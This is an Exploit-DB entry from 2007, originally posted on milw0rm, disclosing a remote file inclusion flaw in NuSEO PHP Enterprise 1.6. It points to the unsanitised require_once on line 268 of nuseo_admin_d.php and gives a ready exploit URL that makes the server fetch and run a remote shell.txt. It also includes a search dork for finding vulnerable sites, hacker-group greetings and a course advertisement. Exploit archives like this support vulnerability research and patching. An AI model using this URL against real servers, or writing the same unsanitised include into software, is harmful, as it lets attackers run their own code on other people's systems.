nuseo PHP enterprise 1.6 - Remote File Inclusion

EDB-ID:

4512


Author:

BiNgZa

Type:

webapps


Platform:

PHP

Date:

2007-10-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Vulnerability Type: Remote File Inclusion
Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php
Exploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuseo_dir
Line number: 268
Lines:

----------------------------------------------

require_once( $nuseo_dir . '/nuseo' . '_d.php' );
//nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' );

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

FoUnD By BiNgZa

DoRk'SEO by NuSEO.PHP'

shadowcrew@hotmail.co.uk

shadow.php0h.com

# milw0rm.com [2007-10-10]